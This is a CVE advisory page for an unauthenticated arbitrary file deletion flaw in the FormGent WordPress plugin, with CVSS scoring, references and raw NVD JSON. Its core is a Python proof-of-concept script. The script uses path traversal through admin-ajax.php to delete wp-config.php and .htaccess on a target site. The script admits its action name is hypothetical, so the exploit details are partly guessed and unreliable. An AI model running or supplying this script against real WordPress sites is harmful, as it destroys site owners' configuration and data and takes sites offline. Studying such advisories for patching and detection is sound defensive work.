CVE-2025-10916

Description

The FormGent WordPress plugin before 1.0.4 is vulnerable to arbitrary file deletion due to insufficient file path validation. This makes it possible for unauthenticated attackers to delete arbitrary files on the server.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FormGent WordPress Plugin < 1.0.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-10916 - FormGent WordPress Plugin Arbitrary File Deletion PoC
# Vulnerability: Insufficient file path validation in FormGent plugin < 1.0.4
# CVSS: 9.1 (CRITICAL)

import requests

TARGET_URL = "http://target-wordpress-site.com"
# The vulnerable endpoint in FormGent plugin that handles file deletion
VULNERABLE_ENDPOINT = "/wp-admin/admin-ajax.php"

def exploit(target_url, file_to_delete):
    """
    Exploit arbitrary file deletion vulnerability in FormGent WordPress plugin.
    
    Args:
        target_url: The base URL of the target WordPress site
        file_to_delete: Relative path to the file to delete (e.g., '../../../wp-config.php')
    """
    url = f"{target_url}{VULNERABLE_ENDPOINT}"
    
    # Construct payload with path traversal to delete arbitrary files
    payload = {
        "action": "formgent_delete_file",  # Hypothetical action name
        "file_path": file_to_delete
    }
    
    # Send exploit request - no authentication required (PR:N)
    response = requests.post(url, data=payload)
    
    if response.status_code == 200:
        print(f"[+] Exploit sent successfully to delete: {file_to_delete}")
        print(f"[+] Response: {response.text}")
        return True
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        return False

if __name__ == "__main__":
    # Target critical WordPress files for deletion
    target_files = [
        "../../../wp-config.php",           # WordPress configuration file
        "../../../.htaccess",                # Apache configuration
        "../../../wp-content/debug.log",     # Debug log file
    ]
    
    for target_file in target_files:
        exploit(TARGET_URL, target_file)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10916
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10916
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10916/
[4] VulDB https://vuldb.com/cve/CVE-2025-10916
[5] https://wpscan.com/vulnerability/81c23998-1abb-495f-890a-79624a4cab9a/
[6] https://wpscan.com/vulnerability/81c23998-1abb-495f-890a-79624a4cab9a/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10916", "sourceIdentifier": "[email protected]", "published": "2025-10-21T06:15:43.527", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FormGent WordPress plugin before 1.0.4 is vulnerable to arbitrary file deletion due to insufficient file path validation. This makes it possible for unauthenticated attackers to delete arbitrary files on the server."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "references": [{"url": "https://wpscan.com/vulnerability/81c23998-1abb-495f-890a-79624a4cab9a/", "source": "[email protected]"}, {"url": "https://wpscan.com/vulnerability/81c23998-1abb-495f-890a-79624a4cab9a/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}